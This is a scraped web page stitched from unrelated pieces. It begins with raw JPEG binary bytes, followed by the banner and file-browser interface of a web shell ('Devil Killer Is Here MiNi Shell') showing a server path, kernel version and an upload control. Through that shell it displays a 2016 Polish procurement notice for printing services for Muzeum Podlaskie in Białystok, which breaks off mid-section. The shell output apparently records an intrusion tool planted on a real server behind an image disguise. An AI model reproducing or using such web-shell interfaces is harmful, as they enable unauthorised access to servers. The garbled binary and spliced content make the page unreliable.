JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160407/80208-N-2016.html

<p class="kh_header"><b>Białystok: Usługa poligraficzna: przygotowanie projektu, skład i druk albumów, książek, informatorów, folderów, zaproszeń, pocztówek reprodukcji, ulotek, wizytówek, plakatów afiszy, kalendarza, wizytówek, materiałów aranżacyjnych wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2016.</b><br>
<b>Numer ogłoszenia: 80208 - 2016; data zamieszczenia: 07.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.bialystok.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa poligraficzna: przygotowanie projektu, skład i druk albumów, książek, informatorów, folderów, zaproszeń, pocztówek reprodukcji, ulotek, wizytówek, plakatów afiszy, kalendarza, wizytówek, materiałów aranżacyjnych wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2016..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa poligraficzna: przygotowanie projektu, skład i druk albumów, książek, informatorów, folderów, zaproszeń, pocztówek reprodukcji, ulotek, wizytówek, plakatów afiszy, materiałów aranżacyjnych wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2016. Usługa poligraficzna obejmuje projekt graficzny wydawnictw, korektę tonalną fotografii, czyszczenie fotografii, skład i druk wydawnictw, adiustację tekstu w języku polskim sprawdzenie pod względem językowym i gramatycznym. W przypadku tekstu w języku angielskim - korektę wykonuje Muzeum. Do części wydawnictw co jest zaznaczone w wykazie dostarczone będą projekty i usługa poligraficzna obejmie tylko druk tych wydawnictw. 

1.	Szczegółowy opis przedmiotu zamówienia:  

Część I zamówienia.  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu sprawdzenie pod względem językowym i gramatycznym, skład, druk albumów, książek i informatorów wraz z dostawą do siedziby Zamawiającego.

1.	Album
album Aleksander Szturman. Malarstwo. Kolekcja Muzeum Podlaskiego w Białymstoku, format 300 na 270 mm pion, środek obj. 60 str. +/- 10%, kreda silk. 170g, kolor 4+4, oprawa twarda szyta nićmi, tektura 2,5mm + oklejka 150g, kolor 4+0+folia matowa, wyklejka 170g offset, niezadrukowana, nakład 500 egz., wydawnictwo posiada Nr ISBN, 
Muzeum dostarczy gotowy projekt do 29 kwietnia 2016
Druk do 17 maja 2016. 


2.	Książka
książka: Podlaskie Zeszyty Archeologiczne 10/2014, format B5, obj. środek ok. 250 stron +/-10%, papier offset 90 g, kolor 4+4, oprawa miękka, klejona, okładka - karton 240 g. kolor 4+0 + folia błyszcząca, nakład 300 egz., wydawnictwo posiada Nr ISSN
Termin przekazania materiałów do przygotowania druku do 29.04.2016
Termin ukończenia druku - max. 2 miesiące od chwili otrzymania materiałów od Zamawiającego

3.	Książka
Ikonosfera, zeszyt 5, format B5 170 na 240 mm,  środek obj. 100 str., kreda mat. 135 g,  kolor 4+4, oprawa miękka, klejona, okładka karton z białym spodem 240 g, kolor 4+0+ lakier punktowo +folia matowa, nakład 350 egz. wydawnictwo posiada Nr ISSN
Termin przekazania materiałów do przygotowania druku do 4 lipca 2016 r., druk wydawnictwa  do 31 sierpnia 2016 r.

4.	Książka
Wielka Synagoga w Tykocinie, format B5, środek obj. ok. 40 str., kreda mat. 140g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład og. 1.000 egz. w tym 500 egz. wersja polskojęzyczna, 500 egz. wersja angielskojęzyczna, wydawnictwo posiada Nr ISBN,
Termin przekazania materiałów do przygotowania druku do końca kwietnia 2016, Druk wydawnictwa  do końca czerwca 2016

5.	Książka z E-publikacją
książka, format B5, środek obj. 320 str. +/- 10%, kreda mat. 130 g., kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 1.000 egz., wydawnictwo angielskojęzyczne;
e-publikacja: nadruk offsetowy CMYK 4+0 + lakierowanie UV wraz z tłoczeniem płyt, nośnik dvd-5, etui foliowe wklejone na wewnętrzną część okładki książki format PDF, w języku polskim, zabezpieczenie przed swobodnym edytowaniem tekstu
wydawnictwo posiada numer ISBN
Termin przekazania materiałów do przygotowania druku do 1 czerwca 2016, druk wydawnictwa  do 10 sierpnia 2016

Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

6.	Książka
książka Ptaki drapieżne w kulturze, format B5, środek obj. 128 str. +/- 10%, kreda 130g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia błyszcząca, wyklejka niezadrukowana, nakład 500 egz., wydawnictwo posiada numer ISBN  
Termin przekazania materiałów do przygotowania druku do 1 czerwca 2016, druk wydawnictwa  do 10 sierpnia 2016

Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

7.	Informator
informator do wystawy Bielski ręcznik ludowy, format B5 poziom, środek: 36 stron, kreda mat. 150g, kolor 4+4, okładka kreda 300 g, kolor 4+0, lakier offsetowy, szycie zeszytowe, nakład 1000 egz. wydawnictwo posiada Nr ISBN
Termin przekazania materiałów do przygotowania druku do 1 czerwca 2016, druk wydawnictwa  do 30 czerwca 2016


8.	Informator
wzornik haftu i koronki Koronka, format B5 poziom, środek: 36 stron, kreda mat. 150g, kolor 4+4, okładka kreda 300 g, kolor 4+0, lakier offsetowy, szycie zeszytowe, nakład 1000 egz. Muzeum dostarczy gotowy projekt
Termin przekazania materiałów do przygotowania druku do 2 listopada 2016, druk wydawnictwa  do 30 listopada 2016

9.	Informator
informator wystawy Tajemniczy ręcznik, format A5 poziom, środek 16 stron, kreda mat. 135 g.,  kolor 4+4, okładka kreda 300g, kolor 4+0+lakier offsetowy, szycie zeszytowe,  nakład: 1000 egz., wydawnictwo posiada Nr ISBN,  Muzeum dostarczy gotowy projekt
Druk wydawnictwa maj 2016r. 

10.	Informator
Reprint informatora hotelu Ritz z 1935 r., wym. 17,0 na 10,7 cm pion, środek 32 strony, papier offsetowy 80 g, w kolorze kremowym, kolor 1+1, oprawa miękka, papier offsetowy  80 g  w kolorze różowym, kolor 1+1, szycie zeszytowe,  nakład - 100 egz.
Termin przekazania materiałów do przygotowania druku do 29 kwietnia 2016, druk wydawnictwa  do 13 maja 2016

11.	Informator
informator Wielka Synagoga w Białymstoku, format A5, środek 20 stron, kreda matowa 150 g, kolor 4+4, oprawa miękka, kreda matowa 300 g, kolor 4 + 4 + folia matowa, szycie zeszytowe, nakład 5000 egz. (wydawnictwo w wersji polsko-angielskiej), posiada Nr ISBN
Termin przekazania materiałów do przygotowania druku do 15 maja 2016, druk wydawnictwa  do 15 czerwca 2016

12.	Informator
informator Przewodnik po Muzeum Wnętrz Pałacowych w Choroszczy - 3 wydanie, 
format A4 składany na 3 na Z, 2 bigi, karton 250 g, kolor 4+4+folia matowa, obustronnie,  2 wszywki w bigowaniach: 16 str. każda, format 1/3 A4,  kreda mat. 150 g, kolor 4+4, nakład 2000 egz., wydawnictwo posiada Nr ISBN
Muzeum dostarczy gotowy projekt, w którym należy dokonać wymiany 8 fotografii oraz fragmentu tekstu. 
Termin druku informatora maj 2016

13.	Katalog
Katalog, Aleksander Kozyrski -Malarstwo, format: 220  na 220 mm , środek obj. 24 str., kreda mat. 150g, kolor 4+4, oprawa miękka, kreda 300g, kolor 4+0+folia matowa, szycie zeszytowe, nakład 300 egz. wydawnictwo dwujęzyczne polsko- angielskie katalog posiada Nr ISBN
Termin przekazania materiałów do przygotowania druku do 10 lipca 2016, druk wydawnictwa  do 30 sierpnia 2016

14.	Zeszyt edukacyjny
Zeszyt edukacyjny do projektu Różnorodność sztuk - sztuka różnorodności
format A4, środek 20 stron, papier offset 120 g, kolor 4+4, szycie zeszytowe, okładka karton 200 g., kolor 4+0+folia błyszcząca, nakład 1.000 szt. Muzeum dostarczy gotowy projekt. 
Termin przekazania materiałów do przygotowania druku do 01 czerwca 2016, druk wydawnictwa  do 20 czerwca 2016


Część II zamówienia.  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, skład, druk folderów, składanek, zaproszeń, pocztówek reprodukcji, ulotek, wizytówek, plakatów afiszy wraz z dostawą do siedziby Zamawiającego.

Foldery/składanki


1.	folder Muzeum Podlaskie w Białymstoku, format 400 na 210 mm, składane na cztery 3 bigi, kreda mat. 250 g, kolor 4+4+lakier offsetowy, nakład 5.000 szt. w tym: 3000 szt. wersja polskojęzyczna, 2000 szt. wersja angielskojęzyczna
Termin przekazania materiałów do przygotowania druku do końca kwietnia 2016, druk wydawnictwa  do końca maja 2016

2.	folder Święty Jan Paweł II w oczach dziecka, format 29,6 x 58,6 cm składany na 4, 3 bigowania, kreda mat. 200 g, kolor 4 + 4+lakier offsetowy, nakład 500 egz.   
Termin przekazania materiałów do przygotowania druku do 07 października 2016, druk wydawnictwa  do 15 października 2016

3.	folder do projektu Różnorodność sztuk - sztuka różnorodności, format A4 składany na 3 dwa bigi, kreda mat. 200 g, kolor 4+4+lakier offsetowy, nakład  500 szt. 
Termin przekazania materiałów do przygotowania druku do 1 czerwca 2016, druk wydawnictwa  do 20 czerwca 2016

4.	Folder, format A4 składany na 3, 2 bigi, kreda 250 g, kolor 4+4+lakier punktowo +folia mat., nakład og. 2.000 szt. w tym: 1000 szt. w języku polskim, 1000 szt. w języku angielskim
Termin przekazania materiałów do przygotowania druku do 15 maja 2016, druk wydawnictwa  do 09 czerwca 2016
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

Zaproszenia

1.	zaproszenie, format A4 składane na 3, 2 bigi, papier offset 200g, kolor 4+0, nakład 2.000 szt. Muzeum dostarczy gotowy projekt.
Druk wydawnictwa maj 2016r. 

2.	zaproszenie, format A5, kreda mat. 300 g, kolor 4+4+lakier offsetowy, nakład 300 szt.
Planowany termin realizacji przygotowania do druku - lipiec,  druk sierpień 2016.

3.	zaproszenie, A5 składane do A6 pion, kreda mat. 250 g, kolor 4+4+ folia mat., nakład 200 szt.
Termin przekazania materiałów do przygotowania druku do 31 maja 2016, druk wydawnictwa  do 09 czerwca 2016
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

Pocztówki/reprodukcje

1.	pocztówka, format A5, biały karton 250g, kolor 4+1+lakier offsetowy, nakład 500 szt.
Termin realizacji grudzień 2016, materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

2.	pocztówka, format A6, biały karton 250 g, kolor 4+1+lakier offsetowy, nakład 2wzory x 500 szt.
Termin realizacji maj 2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

3.	pocztówka, format A6, biały karton 250 g, kolor 4+1+lakier offsetowy, nakład 5 wzorów x 500 szt.
Termin realizacji do 15.06.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

4.	pocztówka, format A6, biały karton 250 g, kolor 4+1+folia mat., nakład 2 x 1.000 szt. 
Termin realizacji do 15.05.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

5.	pocztówka - ulotka, format A6, kreda mat. 350 g, kolor 4+4+folia mat., nakład 1.000 szt. 
Termin realizacji do 15.05.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

6.	Reprodukcja ikony, format A5, kreda 350g, kolor 4 + 1+lakier offsetowy, nakład 500 szt. Muzeum dostarczy gotowy projekt
Termin realizacji do 06.05.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

7.	reprodukcja ikon, format A4, papier samoprzylepny mat. 80 g, sztancowany (po 6 wizerunków na stronie), kolor 4+0; 4 rodzaje reprodukcji po 25 szt. - razem 100 sztuk.   
Termin realizacji do 29.04.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

8.	komplet pocztówek w obwolucie, 10 pocztówek - format A5, kreda mat. 350 g, kolor 4+1+folia mat., obwoluta - format 3xA5, 4 bigi, kreda mat. 350 g, kolor 4+1+folia mat., nakład 2 x 500 kompletów tekst na pocztówkach i obwolucie dwujęzyczny pol. - ang.
Termin realizacji do 31.05.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

9.	komplet pocztówek w obwolucie, 10 pocztówek - format A5, kreda mat. 350 g, kolor 4+1+folia mat., obwoluta - format 3xA5, 4 bigi, kreda mat. 350 g, kolor 4+1+folia mat., nakład 500 kompletów tekst na pocztówkach i obwolucie dwujęzyczny pol. - ang.
Termin realizacji do 31.08.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

10.	pocztówka, format 15 x 10,5 cm, kreda mat. 250 g, kolor 1+0+lakier offsetowy, nakład 5000 szt. Muzeum dostarcza gotowy projekt.
Termin realizacji do 15.06.2016r. 

Ulotki

1.	Ulotka, format A4, kreda mat. 150 g., kolor 4+4, nakład 2000 szt.
Termin przekazania gotowych projektów - 21.10.2016r., termin druku 04.11.2016r.

2.	Ulotka - zawieszka z otworem śr. ok. 5 mm do zawieszenia na haczyku, format 8 x 6 cm, kreda 250g, kolor 4+4+lakier offsetowy, nakład 1.000 szt.
Termin przekazania gotowych projektów - 30.04.2016r., termin druku 31.05.2016r.

3.	Ulotka, format A6, kreda140 g, kolor 4+4, nakład: 3 wzory x 250 szt. 3 zamówienia
Termin realizacji zamówienia maj - sierpień 2016r. 

Wizytówki

1.	Wizytówka - 5x9 cm, papier ecrue 250g, kolor 2+0, 4 wzorów, nakład 4300 szt. Zamawiający dostarczy gotowy projekt do druku

Plakaty/afisze

1.	Afisz, format B1, papier offset, kolor 4+0, nakład 300 sztuk
Termin druku początek czerwca 2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

2.	Afisz, format B2, papier offset, kolor 4+0, nakład 300 sztuk
Termin druku połowa sierpnia 2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

3.	Plakat, format A2 wymiar 594 x 420 mm , kreda mat. 170 g, kolor 4+0, nakład 100 szt.,
Termin przekazani materiałów do druku 21.10.2016r., termin druku 04.11.2016r.

4.	Plakat, format 100cm x 30 cm poziom), papier posterowy blueback, kolor 4+0, nakład 100 szt. 
Termin realizacji do 15 maja 2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem

5.	Plakaty do projektu edukacyjnego, format 100cm x 30 cm poziom), papier posterowy blueback, kolor 4+0, nakład 150 szt. Muzeum dostarczy gotowy projekt.
Termin przekazania materiałów do druku 01.06.2016r., termin druku do 09.06.2016r. 
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

6.	Plakat, format 100x30cm, poziom, papier posterowy blueback, kolor 4+0, nakład 60 szt. Termin przekazania materiałów do druku 31.05.2016r. , termin druku do 09.06.2016r. materiały do druku przekazane będą przez zamawiającego najpóźniej na 2 tyg. przed planowanym drukiem
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

7.	Plakat, format A1, kreda, 180 g, kolor 4+0, nakład 3 wzory x 200 szt.3 zamówienia
Termin realizacji kwiecień - sierpień 2016r.

8.	Plakat, format A1, kreda, 180 g, kolor 4+0, nakład 150 szt. 
Termin przekazania materiałów do druku 31.05.2016r., termin druku 09.06.2016r. 
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014

KALENDARZ

Kalendarz do projektu Sokolarnia, wym. dł. 32 wys. 47 cm, razem 15 stron łączonych spiralą u góry, w tym: strona tytułowa: kreda 250 g, kolor 4+0; strony 2-13: kreda błysk, 180g, kolor 4+0, z przesuwanym na przeźroczystym pasku foliowym oknem w kol. czerwonym, ostatnie 2 strony (14 i 15): karton biały 250g, kolor 4+1+jednostronnie lakierowane mat, z perforowaniem dzielącym każdą kartę na 12 pól pocztówkowych o wym. 14,5 x 10,5 cm, umożliwiającym odrywanie poszczególnych pocztówek; nakład: 500 szt.,
Termin przekazania materiałów do druku 15.05.2016r. , termin druku 15.06.2016r. 
Wydruk w ramach realizacji projektu pn. Ośrodek edukacji ekologicznej Muzeum Podlaskiego - Sokolarnia współfinansowanego z Programu Operacyjnego pn.: Ochrona różnorodności biologicznej i ekosystemów w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014


Część III zamówienia  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, skład, druk materiałów do aranżacji wystaw wraz z dostawą do siedziby Zamawiającego . 

1.	Druk na płótnie Canvas - płótno matowe 400 g. ultra white, kolor 4 + 0  jedno zamówienie  - 44 m2     
2.	Druk na winylu -200 m2
3.	Druk na papierze posterowym - 200 m2
4.	Druk na folii samoprzylepnej podklejanej na spienione PCV 5 mm - 70 m2

Szczegóły dotyczące wykończenia tj. np. zgrzewanie, oczkowanie, klejenie itp. zostaną określone każdorazowo przy zamówieniu. 

Poszczególne zamówienia  z poz. 2 - 3  będą realizowane od kilku do kilkunastu m2.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 22.00.00.00-0, 79.82.00.00-8, 79.82.30.00-9, 22.12.00.00-7, 22.16.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	2) aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu musi spełniać każdy z Wykonawców osobno.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	podaniem ich wartości nie mniejszej niż: I część zamówienia: 80.000,00 zł brutto II część zamówienia: 30.000,00 zł brutto III część zamówienia: 20 000,00 zł brutto a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie usług poligraficznych odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że zamówienia te zostały wykonane należycie, ( Załącznik Nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa szczegółowych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa szczegółowych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa szczegółowych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
